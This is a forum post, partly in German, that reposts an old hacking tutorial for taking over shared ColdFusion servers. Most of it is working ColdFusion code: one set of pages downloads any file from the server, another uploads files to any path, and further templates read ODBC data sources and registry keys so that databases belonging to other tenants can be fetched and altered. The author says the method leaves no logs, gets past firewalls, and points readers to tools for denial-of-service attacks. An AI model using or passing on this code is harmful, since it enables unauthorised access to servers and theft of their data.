I have found this sry but i found nothing in English!
CODE
******************************** * 1. Gerneral INFO * ******************************** -------------------------------- 1. erste grundvoraussetzung ist ein account bei dem provider. 2. bei dem Take OVER des server wird kein protcoll geführt also ich hätte nichts gefunden 3. funktionier natürlich nur bei CF-Servern 4. wir haben nach dem take over die system root rechte ... ----------------------------------------------------------- *********************************************************** * 2. Let us take over this (filtered) server... * *********************************************************** ----------------------------------------------------------- what do we need? wir benötigen folgende files: (diese können nicht geändert werden da sie von allaire verschlüsselt wurden, dies hat zu einem spätern zeitpunkt geringfügige auswirkungen) finden könnt ihr diese driver files unter : ../cfide/administrator/datasources/drivers/ db2_unix.cfm dbase.cfm db2.cfm dsnsecurity.cfm excel.cfm foxpro.cfm informix_unix.cfm informix73.cfm jetoledb.cfm msaccess.cfm mssqlserver.cfm odbc.cfm oledb.cfm openingres_unix.cfm openingres2_unix.cfm oracle_mircrosoft.cfm oracle_unix.cfm oracle_visigenic.cfm oracle73.cfm oracle8_unix.cfm oracle80.cfm paradox.cfm registered_native_drivers.cfm registered_oledb_Drivers.cfm registreddrivers.cfm sqloledb.cfm sybase_unix.cfm sybase11.cfm text.cfm text_unix.cfm visualfoxpro.cfm ########################### Download file from Server:# ########################### Wir brauchen die unterhalb aufgeführten pages (2) ------------ getfile.cfm- ------------ "---- start code ----" "!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"" "html" "head" "title"Unbenannt"/title" "/head" "body" "form action="fileaction.cfm" method="POST"" "input type="Text" name="logpath"" "input type="Submit" name="DownloadFile" value="Datei downloaden"" "/form" "/body" "/html" "----- end code ----" die download form. nun denn jetz brauchen wir noch das fieleaction.cfm wo wir das downloaden festlegen: --------------- fileaction.cfm- --------------- "---- start code ----" "CFCONTENT FILE="#LogPath#" DELETEFILE="No"" "!--- wird da yes angegebn wird nach dem download das file gekillt ---" "----- end code ----" nun nur noch die fileaction.cfm aufrufen und ihr könnt eine datei downloaden ...den pafad wie folgt angeben zb.: c:\winnt\sys tem32\notepad.exe easy oda? ########################################## Upload file to server... any destination:# ########################################## Wir brauchen die unterhalb aufgeführten page (1) -------------------- putfiletoserver.cfm- -------------------- "---- start code ----" "!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"" "html" "head" "title"Upload file "/title" "/head" "body" "form Action="putfiletoserver.cfm?upload=true" enctype="multipart/form-data" Method="Post" " Upload file:"br" "input Name= "gitsrulz" Type = "file"" destination: "input type="Text" name="dest"" "br" "input type = "submit" Value="Upload"""/form" "/body" "/html" "/td" "/tr" "/table" "cfif isdefined ("upload")" "cfif #upload# is "true"" "cffile Action="Upload" filefield="gitsrulz" Nameconflict="overwrite" destination="#form.dest#"" "/cfif""/cfif" "/body" "/html" "----- end code ----" nun nur noch die putfiletoserver.cfm aufrufen und ihr könnt eine datei uploaden ...den pafad wie folgt angeben zb.: c:\winnt\ system32\notepad.exe easy oda? ####################################### readout registry and or db ... hehe # ####################################### 1. es wird vorrausgesetzt, dass ihr bei eurem account dir driver files die unter Punkt 2. Let us take over this (filtered) server... aufgelistet wurden im verzeichnis 'deinhost/drivers/' sind. ****************************************************************** *°~-_.: """ read out registred db from the winregistry """ :._-~°* ****************************************************************** -------------------- getregistredDBs.cfm- -------------------- "---- start code ----" "META NAME="Author" CONTENT="Copyleft 2000 -fallen-angel-. No rights reserved."" "META NAME="Version" CONTENT="$Revision: 43 $ $Modtime: 3:29p $"" "!----------------- Get all registered System ODBC data sources. ---------------" "CFIF #Server.OS.Name# IS NOT "UNIX"" "CFNewInternalRegistry ACTION=SET BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC" ENTRY="ODBC.INI" TYPE="KEY"" "CFNewInternalRegistry ACTION=SET BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC" ENTRY="ODBCINST.INI" TYPE="KEY"" "CFNewInternalRegistry ACTION=SET BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI" ENTRY="ODBC Data Sources" TYPE="KEY"" "CFNewInternalRegistry ACTION=SET BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI" ENTRY="ODBC Drivers" TYPE="KEY"" "CFPARAM Name="Sort" Default="Entry"" "CFNewInternalRegistry ACTION=GETALL NAME="DS_List" TYPE="ANY" SORT="#Sort#" BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources"" "CFNewInternalRegistry ACTION=GETALL NAME="Drivers" BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\ODBC Drivers"" "CFELSE" "CFSET DS_List = cfusion_getodbcdsn()" "/CFIF" "CFSET Method = "GetValidDrivers"""!---Loads the Driver data ---" "CFINCLUDE TEMPLATE="getdriverinfo.cfm"" "a href="drivers/dsnsecurity.cfm"""/a" "HTML" "HEAD""TITLE"ColdFusion Administrator - ODBC-Datenquellen"/TITLE""/HEAD" "LINK Rel="Stylesheet" Type="text/css" Href="../TableDataStylesheet.css"" "FORM Action="index.cfm" Method="post"" "TABLE Width=100%""TR""TD" "/TD""TD Align=right" "INPUT Type="Hidden" Name="VerifyList" Value="All"" "INPUT Type="Submit" Value="Alle überprüfen"" "/TD""/TR""/TABLE" "/FORM" "FORM ACTION="editdsinfo.cfm" METHOD="post"" "TABLE BORDER=0 CELLSPACING=0 CELLPADDING=3 WIDTH="100%"" "TR BGCOLOR="#669966"" "CFOUTPUT" "TD ALIGN="Left" VALIGN="Top"" "FONT SIZE="2" COLOR="##FFFFFF"""B" "A Href="index.cfm?sort=Entry"CFIF IsDefined("VerifyList")"&VerifyList=#URLEncodedFormat(VerifyList)#"/cfif"" Style="color:white;t ext-decoration:none;""Name der Datenquelle"/a" "/B""/FONT" "/TD" "TD ALIGN="Left" VALIGN="Top"" "FONT SIZE="2" COLOR="##FFFFFF"""B" "A Href="index.cfm?sort=Value"CFIF IsDefined("VerifyList")"&VerifyList=#URLEncodedFormat(VerifyList)#"/cfif"" Style="color:white;t ext-decoration:none;""ODBC-Tre iber"/a" "/B""/FONT" "/TD" "TD ALIGN="Left" VALIGN="Top"""FONT SIZE="2" COLOR="##FFFFFF"""B"Überprüfen"/B""/FONT""/TD" "CFIF IsDefined("VerifyList")" "TD ALIGN="Left" VALIGN="Top"""FONT SIZE="2" COLOR="##FFFFFF"""B"Status"/B""/FONT""/TD" "/CFIF" "/CFOUTPUT" "/TR" "CFIF ParameterExists(DoNotShowNewDSForm) IS "No"" "!---- Show the new DS form in the table only if a data source is not being added or updated ----" "TR" "TD ALIGN="Left" VALIGN="Top" NOWRAP Class="Data"" "FONT SIZE="-1" FACE="Arial"""INPUT TYPE="TEXT" NAME="NewDSN" VALUE="""" SIZE=20""/FONT" "/TD" "TD ALIGN="Left" VALIGN="Top" NOWRAP Class="Data"" "FONT SIZE="-1" FACE="Arial"" "CFSET iIndex = 0" "SELECT NAME="DS_CFDriverFile"" "CFLOOP INDEX="iDriverName" LIST="#GVD_RegisteredDrivers#" DELIMITERS=","" "CFSET iIndex = iIndex + 1" "CFOUTPUT""OPTION VALUE="#iDriverName#"" #ListGetAt(GVD_DriverNames,iIndex)#"/CFOUTPUT" "/CFLOOP" "/SELECT" "INPUT TYPE="SUBMIT" NAME="AddDSWasPressed" VALUE=" Hinzufügen... "" "/TD" "TD Class="Data"CFIF NOT IsDefined("VerifyList")"NoBorder"/cfif""" "/td" "CFIF IsDefined("VerifyList")""TD Class="DataNoBorder"" "/td""/cfif" "/TR" "/CFIF" "CFSET RowCount = 0" "CFOUTPUT Query="DS_List"" "CFIF #Server.OS.Name# IS "UNIX"" "CFSET Entry=Name" "CFSET Value=Description" "CFSET Type="STRING"" "/CFIF" "CFSET RowCount = IncrementValue(RowCount)" "TR""CFIF RowCount / 2 is Int(RowCount / 2)" BGColor="##EEEEEE""/cfif" "TD ALIGN="Left" VALIGN="Top" Class="Data"""A HREF="editdsinfo.cfm?EditLinkWasPressed=Yes&OriginalDSN=#URLEncodedFormat(Entry)#""" B"#Entry#"/B""/A""/TD" "TD ALIGN="Left" VALIGN="Top" Class="Data""#Value#"/TD" "TD ALIGN="Left" VALIGN="Top" Class="Data"CFIF NOT IsDefined("VerifyList")"NoBorder"/cfif""""A Href="verifyds.cfm?VerifyDSName=#UR LEncodedFormat(Entry)#""Überpr üfen"/A""/TD" "CFIF IsDefined("VerifyList")" "TD ALIGN="Left" VALIGN="Top" Class="DataNoBorder"" "CFIF VerifyList is "All" OR ListFind(VerifyList, Entry)" "CFIF CF_IsColdFusionDatasource(Entry)"Verifiziert"CFELSE""FONT Color="Red""Fehlgeschlagen"/FONT""/CFIF" "CFELSE"
"/cfif" "/TD" "/cfif" "/TR" "/CFOUTPUT" "/TABLE" "/FORM" "/BODY" "/HTML" "---- end code ----" -------------------- getdriverinfo.cfm - -------------------- "---- start code ----" "CFIF Method IS "GetValidDrivers"" "CFSET ValidDrivers = """ "CFSET GVD_DriverNames = """ "!--- Load the Driver file names. The incude below creates InstalledCFDriverFiles list---" "CFINCLUDE TEMPLATE="drivers/registereddrivers.cfm"" "CFLOOP INDEX="DriverFile" LIST="#InstalledCFDriverFiles#" DELIMITERS=","" "!---- Check for the existence of the files to avoid unnecessary errors ----" "CFIF FileExists(ExpandPath("drivers/#DriverFile#"))" "!---- Run the GetDriver method to retrive DriverName and DriverInstalled ----" "CFSET Method = "GetDriverInfo"" "CFINCLUDE TEMPLATE="drivers/#DriverFile#"" "!------ Add the driver info only if properly installed -------" "CFIF GDI_ODBCDriverInstalled IS "Yes"" "CFSET ValidDrivers = ListAppend(ValidDrivers, #DriverFile#)" "CFSET GVD_DriverNames = ListAppend(GVD_DriverNames, #GDI_CFDriverName#)" "/CFIF" "/CFIF" "/CFLOOP" "!--- Copy the ValidDrivers list into the original GVD_RegisteredDrivers list. This will leave only the properly registered drivers.---" "CFSET GVD_RegisteredDrivers = ValidDrivers" "/CFIF" "!------------------------------ Method: GetCFDriverInfo ------------------- Returns driver information on a specific CF-to-ODBC driver based on a parameter passed in GetInfoOnDriverFile. Method returns: CFDriverFile - The name of the CF-to-ODBC driver file. CFDriverName - The name of the CF-to-ODBC driver file. CFDriverInstalled - Flags whether the CF driver is present on the server. ODBCDriverName - The name of the corresponding ODBC driver. ODBCDriverInstalled - Flags whether the corresponding ODBC driver is present on the server. ------------------------------------------------------------------------------" "CFIF Method IS "GetCFDriverInfo"" "CFSET CFDriverFile = #GetInfoOnDriverFile#" "CFIF FileExists(ExpandPath("drivers/#GetInfoOnDriverFile#"))" "!---- Run the GetDriver method to retrive DriverName and DriverInstalled ----" "CFSET Method = "GetDriverInfo"" "CFINCLUDE TEMPLATE="drivers/#GetInfoOnDriverFile#"" "CFSET GCFDI_CFDriverName = "#GDI_CFDriverName#"" "CFSET GCFDI_CFDriverInstalled = "Yes"" "CFSET GCFDI_ODBCDriverName = "#GDI_ODBCDriverName#"" "CFSET GCFDI_ODBCDriverInstalled = "#GDI_ODBCDriverInstalled#"" "CFELSE" "!--- The CF Driver is not present on the server ---" "CFSET GCFDI_CFDriverName = """ "CFSET GCFDI_CFDriverInstalled = "No"" "CFSET GCFDI_ODBCDriverName = """ "CFSET GCFDI_ODBCDriverInstalled = """ "/CFIF" "/CFIF" "!------------------------------ Method: GetDataSourceInfo ------------------- Returns driver information on a specific ODBC datasource based on a parameter passed in GetInfoOnDataSourceName. Method returns: GDSI_CFDriverFile - The name of the CF-to-ODBC driver file. GDSI_CFDriverName - The name of the CF-to-ODBC driver file. GDSI_CFDriverInstalled - Flags whether the CF driver is present on the server. GDSI_ODBCDriverName - The name of the corresponding ODBC driver. GDSI_ODBCDriverInstalled - Flags whether the corresponding ODBC driver is present on the server. ------------------------------------------------------------------------------" "CFIF Method IS "GetDataSourceInfo"" "!-----Let us find the ODBC driver name for this data source ----" "CFIF #Server.OS.Name# IS "UNIX"" "CFSET GetInfoOnODBCDriver = cfusion_getodbcini("ODBC Data Sources", "#GetInfoOnDataSourceName#", "default")" "CFELSE" "CFNewInternalRegistry ACTION=GET VARIABLE="GetInfoOnODBCDriver" BRANCH ="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources" ENTRY ="#GetInfoOnDataSourceName#" TYPE ="STRING"" "/CFIF" "CFPARAM NAME="ODBCDriverName" DEFAULT=""" "CFIF ParameterExists(GetInfoOnODBCDriver) IS "No"" "!--- Data source was not found ----" "CFSET GDSI_CFDriverFile = """ "CFSET GDSI_CFDriverName = """ "CFSET GDSI_CFDriverInstalled = "No"" "CFSET GDSI_ODBCDriverName = """ "CFSET GDSI_ODBCDriverInstalled = "No"" "CFELSE" "!---- Scan throught the CF Driver files and find corresponding CF driver is available ---" "CFSET bDriverFound = "No"" "!--- Load the Driver file names. The incude below creates GVD_RegisteredDrivers list---" "CFINCLUDE TEMPLATE="drivers/registereddrivers.cfm"" "CFLOOP INDEX="DriverFile" LIST="#InstalledCFDriverFiles#" DELIMITERS=","" "!---- Check for the existence of the files to avoid unnecessary errors ----" "CFIF FileExists(ExpandPath("drivers/#DriverFile#"))" "!---- Run the GetDriverInfo method to retrive info on the CF driver----" "CFSET Method = "GetDriverInfo"" "CFINCLUDE TEMPLATE="drivers/#DriverFile#"" "!------ If ODBCDriverName matches GetInfoOnDataSourceName we got the baby -------" "CFIF #GDI_ODBCDriverName# IS #GetInfoOnODBCDriver#" "!--- The ODBC driver marches that of an CF driver. Return final data ----" "CFSET GDSI_CFDriverFile = "#DriverFile#"" "CFSET GDSI_CFDriverName = "#GDI_CFDriverName#"" "CFSET GDSI_CFDriverInstalled = "Yes"" "CFSET GDSI_ODBCDriverName = "#GDI_ODBCDriverName#"" "CFSET GDSI_ODBCDriverInstalled = "#GDI_ODBCDriverInstalled#"" "CFSET bDriverFound = "Yes"" "/CFIF" "/CFIF" "/CFLOOP" "CFIF bDriverFound IS "No"" "!---- We did not find the CF driver in the loop---" "CFSET GDSI_CFDriverFile = """ "CFSET GDSI_CFDriverName = """ "CFSET GDSI_CFDriverInstalled = "No"" "CFSET GDSI_ODBCDriverName = "#GetInfoOnODBCDriver#"" "CFSET GDSI_ODBCDriverInstalled = """ "/CFIF" "/CFIF" "/CFIF" "--- end code ---" wenn ihr die seite getregistredDBs.cfm startet erhaltet Ihr alle registrierten DatenBANK namen! wenn ihr nun auf eine DB .zb.: cfsnippets klickt wird die 2te seite geladen und ihr erhaltet am anfang den pfad wo die db liegt... gleich unterhalb dieses infos erhaltet ihre folgende fehlermeldung: %%%%%% Error Diagnostic Information Error resolving parameter ENFORCEADMINSECURITY Cold Fusion was unable to determine the value of the parameter. This problem is very likely due to the fact that either: You have misspelled the parameter name, or You have not specified a QUERY attribute for a CFOUTPUT, CFMAIL, or CFTABLE tag. The error occurred while evaluating the expression: NOT #enforceAdminSecurity# OR isAuthorized("UserObject","CFAdministrator") %%%%%%% dies ist ein security check der in den verschlüsselten driver templates, wie oben in general infos beschrieben, eingebunden ist ... dennoch ist das egal da wir nun einfach die DB runterladen und öffnen können ... nun können wir auf unserem account zb.: eine abfrage oder update oder insertto form erstellen und die db online manipulieren. naja das gute daran die DB ist nicht in unserem verzeichnis LOL und wir haben trotzdem zugriff.. ############ #firewalls?# ############ if there is a firewall ... let em be .. *ggg* the firewall will always let us in if u have a ftp account at the cf server.. legal or illegal it doesn't matter ... ######## logged?# ######## i can't found any logfiles where my action was logged ... maybe cause u operate as system root ############# DOS with CF?# ############# most dos bugs are allready fixed. to get the sources of CF DOS goto: http://gits-search.virtualave.net and choose the packetstorm engine and type as keyword CF DOS ############################## read out other registry keys?# ############################## same as u get the db ("CFNewInternalRegistry ACTION=SET BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC" ENTRY="ODBC.INI" TYPE="KEY"") just change the regKEy vorm the ODBC for ex.: to WININI in the getregistredDBs.cfm file i love it to mix english with german ######### Allaire?# ######### sux ##################### How to fix sec hole?# ##################### hmm .. i finally do not know maybe impossible for admins
depends on Allaire they must update there software so than cu .. and happy hacking or whatever ... -fallen-angel- (faster as time) ++++++++++++++++++ +****************+ +* 3. greetings *+ +****************+ ++++++++++++++++++ greetings to (groups): euroarmy.org (irc channel #hackerattack, irc.dal.net, port:7000) 2600.com MiLwOrm L0pth hackerattack.com scheiterhaufen.net, org, com special greetings to: --------------------- massa mastur, hard pete, solaris, fantomas, me and to our cat Herr Miggi greetings to: ------------- Helic, CHiCoSTo, cybermaXX, axall+, LordAidan, Eternal, [XpL]Raptor and all other euroarmy/gits-network members. lovely greetings to:!
Grezz Hyp3r
ThEWaTcHeR
Sep 3 2003, 02:11 PM
deutsch ist auch ok *gg*
(meine heimatsprache)
vielen dank
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
